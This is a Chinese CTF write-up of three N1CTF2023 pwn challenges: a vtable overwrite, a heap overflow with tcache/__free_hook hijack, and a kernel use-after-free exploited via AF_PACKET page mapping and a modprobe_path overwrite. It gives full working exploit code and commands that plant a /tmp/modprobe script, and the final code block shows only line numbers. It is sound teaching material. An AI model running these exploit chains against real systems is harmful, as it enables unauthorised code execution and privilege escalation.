0%

N1CTF2023

n1canary

1
2
3
4
5
6
a.out: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=c1041d9d57f3f4dc0ad3e3ebb251ea748a0832d8, for GNU/Linux 4.4.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,Partial RELRO,Canary,NX

漏洞分析

栈溢出漏洞:

1
2
3
puts("input something to pwn :)");
ProtectedBuffer<64ul>::mut<BOFApp::launch(void)::{lambda(char *)#1}>((__int64)v3, (__int64)&v2);
puts(v3);
1
2
3
4
__int64 __fastcall BOFApp::launch(void)::{lambda(char *)#1}::operator()(__int64 a1, __int64 a2)
{
return _isoc23_scanf((__int64)"%[^\n]", a2);
}

有后门函数:

1
2
3
4
__int64 backdoor(void)
{
return system("/readflag");
}

入侵思路

程序自定义了一个栈保护,使用 sys_getrandom 获取随机数生成 canary,这个 canary 几乎是不可能绕过的

程序使用了智能指针 unique_ptr,因此在当前语句块结束时会调用 BOFApp 的析构函数:

1
2
3
4
std::make_unique<BOFApp>((__int64)v6);
v4 = std::unique_ptr<BOFApp>::operator->((__int64)v6);
(*(void (__fastcall **)(__int64))(*(_QWORD *)v4 + 16LL))(v4);
std::unique_ptr<BOFApp>::~unique_ptr((__int64)v6);

并且 BOFApp 类本身具有虚函数,其虚表可以被我们覆盖:

1
2
3
4
5
6
7
8
9
10
pwndbg> telescope 0x7ffe4b0afa80
00:0000│ rax rdi 0x7ffe4b0afa80 ◂— 0x0
... ↓ 7 skipped
08:00400x7ffe4b0afac0 ◂— 0x0
09:00480x7ffe4b0afac8 ◂— 0xda64322f1f19d59
0a:00500x7ffe4b0afad0 —▸ 0x7ffe4b0afc28 —▸ 0x7ffe4b0b02a6 ◂— 'HTTP_PROXY=http://127.0.0.1:7890/'
0b:00580x7ffe4b0afad8 ◂— 0x7c3b282cea4eec00
0c:00600x7ffe4b0afae0 —▸ 0x7ffe4b0afc18 —▸ 0x7ffe4b0b029e ◂— 0x74756f2e612f2e /* './a.out' */
0d:00680x7ffe4b0afae8 —▸ 0x403407 (main+103) ◂— mov rax, rsp
0e:00700x7ffe4b0afaf0 —▸ 0x6b3730 —▸ 0x4ed510 (__preinit_array_start+48) —▸ 0x40388c (BOFApp::~BOFApp()) ◂— sub rsp, 18h
1
2
3
4
pwndbg> telescope 0x4ed510
00:00000x4ed510 (__preinit_array_start+48) —▸ 0x40388c (BOFApp::~BOFApp()) ◂— sub rsp, 18h
01:00080x4ed518 (__preinit_array_start+56) —▸ 0x4038b8 (BOFApp::~BOFApp()) ◂— sub rsp, 18h
02:00100x4ed520 (__preinit_array_start+64) —▸ 0x403552 (BOFApp::launch()) ◂— sub rsp, 88h

核心思路就是覆盖虚表,使其执行后门函数

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './a.out'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
gdb.attach(p,"b* 0x403909\n")
#gdb.attach(p,"b *$rebase()\n")
pause()

def cmd(op):
sla(">",str(op))

#debug()

vtable_addr = 0x4F4AA0
backdoor = 0x403387

vtable = p64(vtable_addr)
vtable += p64(backdoor)
vtable = vtable.ljust(0x40,b'\x00')

sa("canary",vtable)
sla("pwn :)",b'a'*0x68+p64(0x403407)+p64(vtable_addr))

p.interactive()

n1array

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.7) stable release version 2.31.
1
2
3
4
5
6
pwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=bf9f13ff31aa3f4c4036ab8bf12e14f3abe0d287, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

程序分析

程序维护了一个 hashTable,每个条目都是一个 Chunk 结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
00000000 Chunk struc ; (sizeof=0x40, mappedto_21)
00000000 nelts dd ?
00000004 field_4 dd ?
00000008 atom dq ? ; offset
00000010 name_len dd ?
00000014 field_14 dd ?
00000018 name dq ? ; offset
00000020 value2 dd ?
00000024 value_nelts dd ?
00000028 value dq ? ; offset
00000030 type_nelts dd ?
00000034 field_34 dd ?
00000038 type_key dq ? ; offset
00000040 Chunk ends

其中记录了三种 Atom(name,type,value):

  • name:用于索引 hashTable
  • value:有两种模式
1
2
3
4
5
6
7
8
9
10
if ( a2->key )
{
chunk->value2 = a2->value2; /* 使用value2(整个数组的数据为同一个值) */
}
else
{
if ( (unsigned __int64)(4 * chunk->value_nelts) + 0x14 > a2->len )
__assert_fail("array->value.nelts * 4 + sizeof(struct ValueAtom) <= atom->len", "pwn.c", 0x8Du, "parseValueAtom");
chunk->value = (int *)&a2->value; /* 使用value数组(分别指定数组数据的每一个值) */
}

通过逆向分析,得出三种 Atom 的输入格式如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def value_atom(nelts, value:list, key=0, value2=0):
# len | type | key | value2 | nelts | value
value_data = b"".join([p32(i) for i in value])
tmp = p32(1) + p32(key) + p32(value2) + p32(nelts) + value_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def type_atom(nelts, type:list):
# len | type | nelts | type
type_data = b"".join([p8(t) for t in type])
tmp = p32(2) + p32(nelts) + type_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def name_atom(name:bytes):
# len | type | name_len | name
tmp = p32(3) + p32(len(name)) + name
tmp = p32(4 + len(tmp)) + tmp
return tmp

漏洞分析

该题目的漏洞点比较隐秘,其核心在于 chunk->nelts 可能被重复写入:

1
2
3
4
5
6
7
8
9
10
11
chunk->value_nelts = type->nelts;
if ( type->key )
{
chunk->value2 = type->value2;
}
else
{
if ( (unsigned __int64)(4 * chunk->value_nelts) + 0x14 > type->len )
__assert_fail("array->value.nelts * 4 + sizeof(struct ValueAtom) <= atom->len", "pwn.c", 0x8Du, "parseValueAtom");
chunk->value = (int *)&type->value;
}

当我们先写入一次 chunk->value,再写入更长的 chunk->value2 时就会触发这个漏洞,此时 chunk->nelts 会覆盖为 chunk->value2 的长度,但程序大部分功能仍然优先使用 chunk->value

1
2
3
4
5
6
7
8
9
10
11
if ( a1->value )
{
for ( i = 0; a1->nelts > i; ++i )
printVal(a1->value[i], a1->type_key[i]);
}
else
{
value2 = a1->value2;
for ( j = 0; a1->nelts > j; ++j )
printVal(value2, a1->type_key[j]);
}

这就导致了堆溢出

入侵思路

先利用堆溢出泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
payload = type_atom(0x100, [0]*0x100) + name_atom(b"1111\x00") + value_atom(1, [0x1000]*1) + value_atom(0x100, [0x1000], 1, 0)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2222\x00") + value_atom(0x100, [0x1000]*0x100)
hash(payload)

dele(b"2222\x00")
show(b"1111\x00")

ru(" 0 0 1 2952790016 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr2 = eval(ru(" "))
success("leak_addr2 >> "+hex(leak_addr2))

leak_addr = (leak_addr2 & 0xff)*0x10000000000+leak_addr1*0x100
heap_base = leak_addr-0x300
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

ru(" 5 3758096384 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr = (0x7f & 0xff)*0x10000000000+leak_addr1*0x100
libc_base = leak_addr-0x1ecb00
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

最后劫持 tcache 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x18DD)\n")
#pause()

def value_atom(nelts, value:list, key=0, value2=0):
# len | type | key | value2 | nelts | value
value_data = b"".join([p32(i) for i in value])
tmp = p32(1) + p32(key) + p32(value2) + p32(nelts) + value_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def type_atom(nelts, type:list):
# len | type | nelts | type
type_data = b"".join([p8(t) for t in type])
tmp = p32(2) + p32(nelts) + type_data
tmp = p32(4 + len(tmp)) + tmp
return tmp

def name_atom(name:bytes):
# len | type | name_len | name
tmp = p32(3) + p32(len(name)) + name
tmp = p32(4 + len(tmp)) + tmp
return tmp

def cmd(op):
sla("cmd>>",str(op))

def hash(data:bytes):
# data_len | 0 | data
cmd(0)
ru("atom>>")
p.send(p32(len(data)+8))
p.send(p32(0)+data)

def dele(name):
cmd(2)
sla("name>>",name)

def show(name):
cmd(1)
sla("name>>",name)

def edit(name,index,data):
cmd(3)
sla("name>>",name)
sla("Input Index: ",str(index))
sla("Input New Val: ",str(data))

#debug()

payload = type_atom(0x100, [0]*0x100) + name_atom(b"1111\x00") + value_atom(1, [0x1000]*1) + value_atom(0x100, [0x1000], 1, 0)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2222\x00") + value_atom(0x100, [0x1000]*0x100)
hash(payload)

dele(b"2222\x00")
show(b"1111\x00")

ru(" 0 0 1 2952790016 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr2 = eval(ru(" "))
success("leak_addr2 >> "+hex(leak_addr2))

leak_addr = (leak_addr2 & 0xff)*0x10000000000+leak_addr1*0x100
heap_base = leak_addr-0x300
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

ru(" 5 3758096384 ")
leak_addr1 = eval(ru(" "))
success("leak_addr1 >> "+hex(leak_addr1))
leak_addr = (0x7f & 0xff)*0x10000000000+leak_addr1*0x100
libc_base = leak_addr-0x1ecb00
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base+libc.sym["__free_hook"]
system = libc_base+libc.sym["system"]
binsh = libc_base+next(libc.search(b"/bin/sh"))
success("free_hook >> "+hex(free_hook))
success("system >> "+hex(system))

payload = type_atom(0x100, [0]*0x100) + name_atom(b"1\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"2\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(b"3\x00") + value_atom(1, [0x1000]*1)
hash(payload)

dele(b"1\x00")
dele(b"2\x00")
dele(b"3\x00")

data = (free_hook >> 8) & 0xffffffff
edit(b"1111\x00",0x100-2,data)
data = (free_hook >> 40) & 0xffffffff
edit(b"1111\x00",0x100-1,data)
data = (free_hook & 0xff) * 0x1000000
edit(b"1111\x00",0x100-3,data)

payload = type_atom(0x100, [0]*0x100) + name_atom(b"a"*0x10+b";/bin/sh\x00") + value_atom(1, [0x1000]*1)
hash(payload)
payload = type_atom(0x100, [0]*0x100) + name_atom(p64(system)) + value_atom(1, [0x1000]*1)
hash(payload)

dele(b"a"*0x10+b";/bin/sh\x00")

p.interactive()

n1sub

1
2
~ $ cat /proc/version 
Linux version 6.1.58 (chuj@pwn-host.nixos) (gcc (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #1 SMP PREEMPT_DYNAMIC Mon Oct 16 12:23:54 CST 2023
1
2
3
4
5
6
7
8
9
10
11
12
qemu-system-x86_64 \
-m 512M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-append 'console=ttyS0 kaslr quiet loglevel=3 oops=panic panic=-1' \
-netdev user,id=net \
-device e1000,netdev=net \
-no-reboot \
-monitor /dev/null \
-cpu qemu64,+smep,+smap \
-smp cores=2,threads=1 \
-nographic -s
  • smep,smap,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs none /tmp
mount -t devtmpfs none /dev
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
insmod /sub.ko
chmod 666 /dev/n1sub
setsid /bin/cttyhack setuidgid 1000 /bin/sh #normal user
umount /proc
umount /sys
poweroff -d 0 -f

题目给了配置文件,有些内核保护并没有开启:

1
2
3
4
# CONFIG_MEMCG is not set /* 关闭内存控制器(GFP_KERNEL和GFP_ACCOUNT之间没有隔离) */
# CONFIG_SLAB_FREELIST_RANDOM is not set /* 关闭slab freelist随机化 */
# CONFIG_SLAB_FREELIST_HARDENED is not set
# CONFIG_SLUB_STATS is not set

漏洞分析

UAF 漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
if ( cmd == 0xDEADBEE1 )                      // dele
{
if ( arg > 2 )
goto LABEL_4;
if ( !bufs_free[arg] )
{
kfree(bufs[arg]);
bufs_free[arg] = 1;
}
raw_spin_unlock(&ioctl_lock);
return 0;
}

USMA 用户态映射攻击

在 Linux 内核中的 packet socket 模块可以让用户在设备驱动层接受和发送 raw packets,并且为了加速数据报文的拷贝,它允许用户创建一块与内核态共享的环形缓冲区:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}
  • pg_vec 实际上是一个保存着连续物理页的虚拟地址的数组,而这些虚拟地址会被 packet_mmap 函数所使用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
unsigned long size, expected_size;
struct packet_ring_buffer *rb;
unsigned long start;
int err = -EINVAL;
int i;

if (vma->vm_pgoff)
return -EINVAL;

mutex_lock(&po->pg_vec_lock);

expected_size = 0;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec) {
expected_size += rb->pg_vec_len
* rb->pg_vec_pages
* PAGE_SIZE;
}
}

if (expected_size == 0)
goto out;

size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;

for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
page = pgv_to_page(kaddr);
err = vm_insert_page(vma, start, page); /* 将内存页插入到用户态的虚拟地址空间中 */
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}

atomic_inc(&po->mapped);
vma->vm_ops = &packet_mmap_ops;
err = 0;

out:
mutex_unlock(&po->pg_vec_lock);
return err;
}
  • packet_mmap 将这些内核虚拟地址代表的物理页映射进用户态,这样普通用户就能在用户态对这些物理页直接进行读写
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int vm_insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page)
{
if (addr < vma->vm_start || addr >= vma->vm_end)
return -EFAULT;
if (!page_count(page))
return -EINVAL;
if (!(vma->vm_flags & VM_MIXEDMAP)) {
BUG_ON(mmap_read_trylock(vma->vm_mm));
BUG_ON(vma->vm_flags & VM_PFNMAP);
vma->vm_flags |= VM_MIXEDMAP;
}
return insert_page(vma, addr, page, vma->vm_page_prot);
}
EXPORT_SYMBOL(vm_insert_page);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static int insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page, pgprot_t prot)
{
struct mm_struct *mm = vma->vm_mm;
int retval;
pte_t *pte;
spinlock_t *ptl;

retval = validate_page_before_insert(page);
if (retval)
goto out;
retval = -ENOMEM;
pte = get_locked_pte(mm, addr, &ptl);
if (!pte)
goto out;
retval = insert_page_into_pte_locked(mm, pte, addr, page, prot);
pte_unmap_unlock(pte, ptl);
out:
return retval;
}
1
2
3
4
5
6
7
static int validate_page_before_insert(struct page *page)
{
if (PageAnon(page) || PageSlab(page) || page_has_type(page))
return -EINVAL;
flush_dcache_page(page);
return 0;
}
  • 检查 page 是否为匿名页,是否为 Slab 子系统分配的页,以及 page 是否含有 type
  • 内存页的 type 总共有以下几种:
1
2
3
4
5
#define PG_buddy	0x00000080	/* 伙伴系统中的页 */
#define PG_offline 0x00000100 /* 为内存交换出去的页 */
#define PG_kmemcg 0x00000200 /* 为kmemcg使用 */
#define PG_table 0x00000400 /* 作为页表的页 */
#define PG_guard 0x00000800 /* 作为内存屏障的页 */

通过如下函数快速的创建一个 AF_PACKET 协议的原始套接字:

1
socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); /* AF_PACKET是原始套接字协议,是一种特殊的套接字协议,可以是数据链路层原始套接字 */
1
2
int version = TPACKET_V3;
setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)); /* 设置当前AF_PACKET套接字协议版本为TPACKET_V3 */
1
2
3
4
5
6
7
8
9
10
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_block_size = block_size;
req3.tp_block_nr = block_nr;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = frame_nr;
req3.tp_retire_blk_tov = retire_blk_tov;
req3.tp_sizeof_priv = 0;
req3.tp_feature_req_word = 0;
setsockopt(recv_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3)); /* 创建ring buffer(pg_vec) */

入侵思路

有 UAF 漏洞,但是 size 是随机的:

1
2
size = (unsigned int)get_random_u32() % 0x7B0 + 0x68;
sub_offset = ((unsigned int)get_random_u32() % (size - 0x50) + 0x50) & 0xFFFFFFF8;
  • size = [0x68, 0x818]
  • sub_offset = [0x50, sub_size]

此时需要使用 USMA(用户态映射攻击)

具体思路就是先申请一个 chunk 并读取 sub_size,释放后根据 sub_size 的大小来创建一个与之匹配的 ring buffer(pg_vec),由于程序没有开 slab freelist 随机化,因此这个 UAF 大概率会命中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
   save_status();
bind_core(0);
unshare_setup();
fd = open("/dev/n1sub", O_RDWR);
if (fd < 0)
err_exit("open /dev/n1sub");

int socket_list[0x100];
for (int i = 0; i < 0x80; i++)
socket_list[i] = create_socket_and_alloc_pages(PAGE_SIZE, 1);

sub_size = add();
printf("sub_size: 0x%x\n",sub_size);
printf("sub_offset: 0x%x\n",sub_offset);
int block_nr = sub_size / 0x8;
dele(0);

int packet_fds = packet_socket_setup(PAGE_SIZE, 0x800, block_nr, 0, 1000);

内核模块会以 sub_offset 为偏移来修改 ring buffer(pg_vec) 中的数据(连续物理页的虚拟地址),导致程序映射到非预期的内存空间

  • 当程序执行 mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0) 进行映射时,函数 packet_mmap 会将 ring buffer(pg_vec) 中的各个物理页映射给用户态程序(表现为一个大内存块)
  • 另外 validate_page_before_insert 函数会进行检查,这导致通常情况下可以用于泄露的物理页没法成功映射(PG_buddy 表示该物理页可以被分配给其他进程使用,而 slab 分配的页面都带有 PG_buddy 标记)

之后我们可以通过 sub_offset 来定位非预期物理页的位置,进而打印出非预期的数据

这里的内存扫描有点困难,需要一个可以用于泄露或者劫持程序流程的物理页:

  • 用于泄露的内存页:先关闭内核地址随机化,再打印指针即可
  • 劫持程序的内存页:尝试覆盖指针,看看是否会引发段错误

这里我参考了网上 wp 的方法:先断点到 kfree(bufs[arg]),尝试查找 bufs 所在的内存页

1
2
3
4
5
6
7
8
pwndbg> search -t qword 0xffff888004e12000
Searching for value: b'\x00 \xe1\x04\x80\x88\xff\xff'
<pt> 0xffff888004844358 0xffff888004e12000
<pt> 0xffff888004cc3370 0xffff888004e12000 /* target */
<pt> 0xffff888004d5ad98 0xffff888004e12000
<pt> 0xffff888004e12570 0xffff888004e12000
<pt> 0xffffc90000217d98 0xffff888004e12000
<pt> 0xffffffffc0002370 0xffff888004e12000 /* target */
  • 打印 0xffffffffc0002370 所在内存页
1
2
3
4
5
6
7
pwndbg> telescope 0xffffffffc0002000
00:00000xffffffffc0002000 ◂— 0x0
01:00080xffffffffc0002008 —▸ 0xffffffff8293d8c0 ◂— 0xffffffffc0002008
02:00100xffffffffc0002010 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
03:00180xffffffffc0002018 ◂— 0x627573 /* 'sub' */
04:00200xffffffffc0002020 ◂— 0x0
... ↓ 3 skipped
1
2
3
4
5
6
7
pwndbg> telescope 0xffff888004cc3000
00:00000xffff888004cc3000 ◂— 0x0
01:00080xffff888004cc3008 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
02:00100xffff888004cc3010 —▸ 0xffffffff8293d8c0 —▸ 0xffffffffc0002008 ◂— 0xffffffff8293d8c0
03:00180xffff888004cc3018 ◂— 0x627573 /* 'sub' */
04:00200xffff888004cc3020 ◂— 0x0
... ↓ 3 skipped
  • 此时我们可以发现 0xffff888004cc30000xffffffffc0002000 都映射了内核模块的 bss 段

对于 0xffffffffc0002000 我们是控制不了的,但程序不知道是什么原因也在 0xffff888004cc3000 映射了一遍 bss 段,这就导致了我们可以直接控制 bss 段上的地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
uint64_t *unexpected_page;
int index;
while (1)
{
for (uint64_t i = 0; i < PAGE_SIZE; i++)
edit(0);

char *page = mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0);
if ((uint64_t)page == -1)
continue;

print_hex(page, 0x100);
unexpected_page = (uint64_t *)((sub_offset / 0x8) * PAGE_SIZE + page);
if (unexpected_page[0x3] == 0x0000000000627573){
puts("find target");
break;
}

munmap(page, PAGE_SIZE * block_nr);
if (index++ > 0x200){
err_exit("UAF error");
}
}

控制 bss 段上的地址,配合内核模块实现的功能就可以任意写(只能减少)

接下来最简单的提权方法就是修改 modprobe_path(将 /sbin/modprobe 修改为 /tmp//modprobe

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>
#include <ctype.h>

#include "kernelpwn.h"
#define PAGE_SIZE 0x1000

int fd;
struct argg {
size_t data;
};

uint32_t sub_size, sub_offset;

int add(){
return ioctl(fd, 0xDEADBEE0, &sub_offset);
}

int dele(int index){
return ioctl(fd, 0xDEADBEE1, index);
}

int edit(int index){
return ioctl(fd, 0xDEADBEE2, index);
}

int main(int argc, char** argv, char** envp){
save_status();
bind_core(0);
unshare_setup();
fd = open("/dev/n1sub", O_RDWR);
if (fd < 0)
err_exit("open /dev/n1sub");

int socket_list[0x100];
for (int i = 0; i < 0x80; i++)
socket_list[i] = create_socket_and_alloc_pages(PAGE_SIZE, 1);

sub_size = add();
printf("sub_size: 0x%x\n",sub_size);
printf("sub_offset: 0x%x\n",sub_offset);
int block_nr = sub_size / 0x8;
dele(0);

int packet_fds = packet_socket_setup(PAGE_SIZE, 0x800, block_nr, 0, 1000);

uint64_t *unexpected_page;
int index;
while (1)
{
for (uint64_t i = 0; i < PAGE_SIZE; i++)
edit(0);

char *page = mmap(NULL, PAGE_SIZE * block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds, 0);
if ((uint64_t)page == -1)
continue;

print_hex(page, 0x100);
unexpected_page = (uint64_t *)((sub_offset / 0x8) * PAGE_SIZE + page);
if (unexpected_page[0x3] == 0x0000000000627573){
puts("find target");
break;
}

munmap(page, PAGE_SIZE * block_nr);
if (index++ > 0x200){
err_exit("UAF error");
}
}

uint64_t kernel_base = unexpected_page[0xF] - 0x1851720;
uint64_t modprobe_path = kernel_base + 0x1852420;

printf("kernel_base: 0x%lx\n", kernel_base);
printf("modprobe_path: 0x%lx\n", modprobe_path);

uint32_t difference[] = {0, 0xFF, 0xF4, 0xF8, 0x3E};
for (int i = 1; i <= 0x5; i++){
unexpected_page[0x6E] = modprobe_path - sub_offset + i;

for (uint32_t j = 0; j < difference[i]; j++)
edit(0);
}

system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
system("echo '#!/bin/sh\nchmod 777 /flag' > /tmp/modprobe");
system("chmod +x /tmp/modprobe");
system("chmod +x /tmp/dummy");

system("/tmp/dummy");
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
